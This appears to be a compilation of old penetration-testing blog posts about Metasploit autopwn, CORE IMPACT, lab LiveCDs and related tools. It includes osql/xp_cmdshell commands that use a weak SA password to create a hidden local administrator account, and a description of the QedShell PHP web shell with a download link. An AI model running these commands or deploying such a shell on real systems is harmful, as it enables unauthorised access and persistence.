Metasploit is a free, open source tool for developing and executing exploit code against a remote target machine. In regards to automated penetration testing, starting with version 3, Metasploit offers a module called “autopwn” which can automate the exploitation phase of a penetration test. While autopwn is far from perfect, it does a decent job of exploiting multiple hosts. With 269 exploits (as of the latest update) you have lots of options (especially with Windows targets) for gaining a basic bind shell with autopwn.

Some of the strengths of autopwn include the ability to import vulnerability data from Nessus NBE files and to pull in Nmap XML output. Nice feature that works well. In addition, you can run Nmap from within the Metasploit console and it will put the results in the database. Finally, you can launch exploits based on ports, services or vulnerabilities from your imported data.

Limitations of autopwn
Autopwn has some limitations worth mentioning. Autopwn requires either a MySQL, Sqlite or Postgres database. Some pre-configuration required which may be a daunting task for some users. RubyGems, active record (part of ruby on rails), and getting the database configured to work with autopwn are all required. In terms of payloads you are pretty limited as well. Unfortunately with the current version you can only use a basic bind shell as your payload.

If you are looking for fancy reports with your vulnerability data you will have to do that on your own as there is no automated reporting in autopwn. On that same note…decent logging within Metasploit is limited to the debug modes. I recommend you run the “script” command from a shell before you start up the msfconsole so everything is logged to a file. Not much you can do if you use the GUI or web consoles for Metasploit except for screen shots.

Finally, if you are exploiting large numbers (several hundred) or wanting to import a ton of Nessus data..you are going to take a performance hit. Autopwn seems to choke on lots of data. This will probably be fixed as it gets tweaked and tuned in future versions.

More information
HD Moore wrote up a very good autopwn tutorial which you can check out on the official Metasploit blog.

If you really want to quickly test out the features of autopwn without a lot of setup work, I recommend that you download one of the Backtrack disks. Backtrack 2 has autopwn ready to go once you launch the ninja script. Backtrack 3 beta has it installed but you need to update everything first on the disk by using the fast-track.py script which is included. Fast-track is a very useful script if you are a regular user of Backtrack…the creator of this script (Dave Kennedy from SecureState) was actually at the meeting last night and I got to chat with him about some cool stuff coming soon to the fast-track script and some new “to be announced” modules for Metasploit.

You can download the Metasploit presentation I did here. I plan on putting together a tutorial on autopwn installation in the near future. If you were at the talk last night, thanks for all the nice comments and for coming out!

Interview with GNUCITIZEN – Part 1
Interview with GNUCITIZEN – Part 2

The webcast talks about the motivations for performing penetration testing to improve the security stance of an enterprise and covers some in-depth Windows command-line tips that can help penetration testers use Windows machines more effectively during a penetration test.

You can download the slide deck from Core Security Technologies here.

Last week I spoke at a local security professionals user group about Automated Penetration Testing with CORE IMPACT (from Core Security Technologies). There has been some great developments in the automated penetration testing area recently with commercial tools like CORE IMPACT and Immunity’s CANVAS. However, lets not forget about recent advancements with open source solutions like Metasploit 3. All of these products perform automated penetration testing.

Instead of posting my slide deck I will highlight some of the key points below. Note that this is presented from the perspective of a customer, this was not a sales pitch for CORE IMPACT even though they do have a great product. Next month I will be speaking about Metasploit 3, specifically talking about the autopwn feature which automates exploiting network hosts. One thing I want to mention, automated penetration testing should never replace detailed manual penetration testing! You should use these tools to supplement your tool kit, not replace them!

First, some background on automated penetration testing tools:

What makes a good penetration testing framework?
A framework should be platform independent. Meaning, it should be able to be installed on on Windows, Mac, or Linux. A good exploit collection w/regular updates are also important. Third, an intuitive and robust GUI should be included. This is really to make sure everyone on your pen test team can quickly pick it up and use the product with very little training. Next, you need to have the ability to add new exploits! This is important because you may need to create an exploit for a custom application or even a new one that you may discover. Along that same line is that the product should be open source or have the ability to customize and view the exploit code. Finally, good reporting tools should also be included since the is one of the challenges of pen testing, report generation.

What frameworks are available?
Several commercial and open source penetration frameworks are available. Ones listed towards the bottom of this list are more specialized (example, there are ones specific web application and email gateway testing).

Commercial Tools
CORE IMPACT
Immunity Canvas

Open Source Tools
Metasploit Framework
Inguma
Attack Tool Kit
SecurityForest
BeEF (Browser Exploitation Framework)
PIRANA (email content filtering framework)
w3af - Web Application Attack and Audit Framework

What is CORE IMPACT?
CORE IMACT is a commercial penetration testing framework. The product uses a common pen test methodology:

-Information Gathering
-Attack and Penetration
-Privilege Escalation
-Clean Up and Reporting

CORE IMPACT provides network, client-side and web (SQL Injection and PHP remote file inclusion) RPT (Rapid Penetration Test) functions. It is easy to use (almost too easy) and is safe because all the exploits are tested by the CORE IMPACT development team before being released to customers. In addition, you can develop your own custom modules and exploits in the Python scripting language. Finally, lets not forget about the pretty reports that CORE IMPACT can give you via a Crystal Reports back end.

How does it work?
You basically launch agents and modules against target systems from the console.

Agents- Small programs you install on compromised systems and use to advance an attack. These agents are memory resident! (think Metasploit’s meterpreter). The level of agents give you additional functionality (example: pivoting)

Modules- Operations that can be launched against target systems. Examples: OS fingerprinting, port scanning, and targeted exploits.

You can also view detailed information about target systems. CORE IMPACT also keeps a record of all activity, module output, and the results of attacks. Good to know if you ever need to go back and prove that it wasn’t you who crashed a system or network device!

Cool Features
Hands down, pivoting, is the highlight of the product. For example, you can use a compromised host in a DMZ like a web server and then use that host to scan and attack other hosts on an internal network. You can do this with Metasploit and Netcat as well but CORE IMPACT does it much more smoothly. Some other features worth mentioning:

-Collect Windows password hashes in-memory
-Log keystrokes, sniff passwords and hashes
-Collect saved login credentials from popular applications such as Internet Explorer, Firefox and MSN
-Install agents with valid user name, password, hash combinations
-MSRPC fragmentation and traffic encryption (Test IDS/IPS defenses)
-Ability to import vulnerability scan data (Nessus, Qualys)

Limitations
CORE IMPACT comes pretty close to perfect, however, I have found a few limitations:

Importing external vulnerability data can be slow and buggy. If you have very large Nessus NBE files, it can take a long time to import these files. I have had the console crash with large amounts of data being imported. That being said, the console is sometimes unstable. This was a big problem in version 6, however, version 7 is much more stable. When the console crashes, it causes all of your agents to disconnect. Do you know Python? If so, great! If not, you should if you want to tear apart existing exploits or create your own.

CORE IMPACT won’t tell you everything able to be exploited on a host! CORE IMPACT is designed to quickly exploit and get you root or admin access on a host! If there are other ways in or other misconfiguration, the product will probably miss those. Hence, the reason you still need to do manual penetration testing of your network and need to have a detailed vulnerability scan competed as part of each assessment.

Finally, CORE IMPACT is expensive! If you work for a small company you may not be able to afford it! However, if you think about how much a third-party penetration test would cost your company per year, you could easily justify this cost to do this on your own.

Conclusion
CORE IMPACT is a fantastic product. If you need to quickly conduct a penetration test to assess your environment CORE IMPACT will efficiently and safely do the job for you. However, CORE IMPACT is expensive so you may have a hard time justifying the cost to your company. If cost is an issue, Metasploit 3 or another open source product may be a better option.

Download it here:
http://fronted.quzart.nl/component/option,com_remository/func,fileinfo/id,11/

= Modules =
QedShell is scripted in modules – for example the Fileadmin module – so new add-ons are easy to make.
A module is basicaly a class with two functions, preprocess() and process(). The first one is to execute code before output is started. The process() function executes code that goes between the HTML header and footer.
Why use two functions? Well if you want to download a file from the server then the PHP script should first tell the browser to download something. This is done in the HTTP headers. If the HTML headers are already send then of course the HTTP headers are also send, and thus you cant tell the browser to download something. Also in the preprocess() function you can set alert messages that are shown in the HTML header.

These modules are already scripted:
- Fileadmin, browse through files/directories, chmod, delete, rename, edit and download them.
- Mail, send emails, you can set the Senders email and name, set the Receivers email and name, set the subject and content of the email. And this module supports HTML emails.
- phpInfo, show phpInfo();
- Security, show some general info about the current system and configuration, for example: is the /etc/passwd readable, are program, posix and socket functions enabled.
- Posix, if the posix functions are enabled then we can generate a /etc/passwd and /etc/groups file.
- Encoder, encoding/hashing/converting strings.
- phpCode, execute PHP code
- Port mapper, if the socket functions are enabled then we can check wich ports are already opened and thus see what services are running.

If you have some request for future, found bugs or want to script something post something on the De-ICE forum or send an email to: qedshell [at sign] quzart.nl

= Code structure =
This is how QedShell works:
- First parse user config.
- Check if the user/password is ok (optional).
- Check if the requested module exists, else show the fileadmin module.
- Execute the preprocess() function of the current module
- Show HTML header
- Execute the process() function of the current module
- Show HTML footer

= Future =
I think about making some more modules:
- FTP admin
- MySQL admin
- PHP backconnect shell
- PHP proxy server
Of course if you have suggestions or want to script something yourself, just send a mail to qedshell [at sign] quzart.nl

= Download =
You can download the latest version of QedShell here:
http://fronted.quzart.nl/component/option,com_remository/func,fileinfo/id,11/

“The latest version features a graphical user interface, full support for the Windows platform, and over 450 modules, including 265 remote exploits…”

This is a significant improvement for the Windows version and it looks like the amount of exploits available has increased. Looking forward to testing this out! You can download the new Metasploit Framework v3.1 here.

Thomas over at De-ICE.net has just released the first disk in the more advanced “Level 2″ set of Live PenTest LiveCD scenarios.

The Level 2 disks are designed to be much more difficult then the Level 1 disks. There are no spoilers or hints provided and it won’t be easy to exploit the system (as in Metasploit won’t help you here). It is up to you to figure out a way to hack into the system. Here is your scenario:

“The scenario for this LiveCD is that you have been given an assignment to test a company’s 192.168.2.xxx network to identify any vulnerabilities or exploits. The systems within this network are not critical systems and recent backups have been created and tested, so any damage you might cause is of little concern. The organization has had multiple system administrators manage the network over the last couple of years, and they are unsure of the competency previous (or current) staff.”

Setting up a lab to run the disks is really easy…you can use VMware (Player or Workstation) or two old PC’s with a router/switch/dhcp server. Your “attack” machine is the Backtrack security distribution LiveCD. Everything you need to hack the Level 2 disk is included on the Backtrack distribution.

Disk Download and More Information
Download the Level 2 disk from MegaUpload (this location will change once the initial rush is over).

Read all the documentation in the PenTest LiveCD Wiki and participate in the de-ice.net forums if you have specific questions.

“I (Richard) contacted several PR reps at TruTV and asked about Tiger Team’s future. One of them wrote back:

Thank you for your email and interest in Tiger Team. Tiger Team was a special and likely won’t be returning. Please let me know if I can assist you with anything else.“

Thats really too bad. I thought this was a great show! I guess I am biased however, since I am a penetration tester myself. The more I think about this I assume that the general public may think that the “tiger team” concept is a little over the top…as well as trying to find companies that want to go on the record that they got hacked and/or robbed. Oh well it was a great show while it lasted!

You can watch the episodes via CourtTV. There are also Torrents available…

“PenTesting Fundamentals”
The following topics are covered in the course:

* The need for penetration testing in a corporate environment
* Penetration Testing Methodologies
* Project Management requirements and methods used during the engagement
* How and what to document during the engagement
* Tools and methods used to conduct an extensive Pentest project
* Hands-On experience conducting your own penetration test

“By the end of the week-long course, the student will be able to conduct and document a penetration test independently, using the ISSAF methodology as taught in the class. Successful completion of the course includes the student providing a finished document to the instructor of their independent penetration testing project as detailed by the ISSAF standards. The penetration test required for course completion will be against one of the course-provided LiveCDs. This LiveCD has not been released to the general public, and will only be available through the course offering.”

Good to see that he is following the very detailed methodology of the ISSAF (check the whole 800 page document out here, good stuff). I recommend everyone check out his site as well as the De-ICE LiveCD’s. I am working with Thomas on a Wiki format for the documentation that I started which should be up in the near future.

You can check out the details for the online training here.

If you find a blank or easy to guess SA password and the database is Microsoft SQL 7, 2000, or 2005 (xp_cmdshell is also available in Sybase but you would use the iSql tool) you can use the “osql” utility to easily connect to the database and run commands if xp_cmdshell is enabled. Osql is installed with a MSDE or SQL Server installation.

If xp_cmdshell is not enabled you can restore the procedure pretty easily as well. Here is a article on this. Note that a Google search can give you more information on restoring xp_cmdshell (even if the .dll was removed).

So what are the commands to use?

osql -S [host name or IP] -U sa -P [password or "" for null]
exec master..xp_cmdshell ‘command to run’
go

So for example…say I want to create a local administrator account on a Windows SQL server with xp_cmdshell enabled:

exec master..xp_cmdshell ‘net user hacker password /add’
go
exec master..xp_cmdshell ‘net localgroup administrators hacker /add’
go

You can run any command you like so you can get creative!

WifiZoo v1.2 – Gather Wifi Information Passively | Darknet – The Darkside

“…how do you know if the PoC (proof of concept) exploit code you downloaded from Milw0rm or Packet Storm includes a backdoor?”

The author also mentions some very good things to consider when planning a pen test and I have added a few of my own:

- Do you need to run the pen test in a production environment? While I think that you should to simulate a real attack..some companies are not comfortable with that. Always be sure to find out and include this in your contract and/or authorization letter.

- Review your toolkit and make sure that you are not using tools and exploits that will cause a DoS or system to crash. Of course systems do crash sometimes which are out of your control (hence the reason you have a authorization to test letter), however, as a pen tester you should be doing everything you can to make sure you don’t purposely crash or DoS systems. I suggest that at least 2-3 times a year your pen test team should meet for a few days and review your toolkit and perform detailed testing of these tools and code.

- Review and test PoC and exploit code before running it in a production environment. I don’t think the client would be too happy if you inadvertently Trojan’d their systems!

- Try to supplement your team tool kit with a commercial tool like Core Impact or Immunity Canvas as these exploits are tested and have options to help ensure a targeted system does not crash.

You can view the entire archived webcast below (presentation by Dave Shackelford).

Note: you have to register for an account on the SANS portal to view the presentation but I highly recommend you do that anyway just to get the great SANS newsletters every week.

SANS Institute – Ask The Expert Webcast: One Team, Two Team, Red Team, Blue Team

* Outbound or inbound connections, TCP or UDP, to or from any ports
* Full DNS forward/reverse checking, with appropriate warnings
* Ability to use any local source port
* Ability to use any locally-configured network source address
* Built-in port-scanning capabilities, with randomizer
* Built-in loose source-routing capability
* Can read command line arguments from standard input
* Slow-send mode, one line every N seconds
* Optional ability to let another program service inbound connections

Netcat – The TCP/IP Swiss Army Knife

digg – Social Engineering, the USB Way

So Immunity is about to release a wireless handheld called “SILICA” that includes hundreds of exploits to perform automated pen testing. If you are not aware Immunity sells a product called “Canvas” which is in direct competition with “Core Impact” from Core Security Technologies. Basically, both these companies offer products very similar to the Metasploit Framework but a bit more automated. Whether or not commercial products are better then Metasploit for pen testing is a hot topic..I personally think you can get everything you want (and more) from Metasploit..but I really like the idea of putting all of this together in a handheld wireless device. As a bonus you can apparently connect this up to a “wired” network as well through ethernet via USB cable so it can be used on non-wireless networks as well. Too bad the going rate will be $3,000! However, I would think that his is just the beginning of open source tools and software that will be ported or available to pocket pc type of devices in the future.

‘Pen’ Testing in the Palm of Your Hand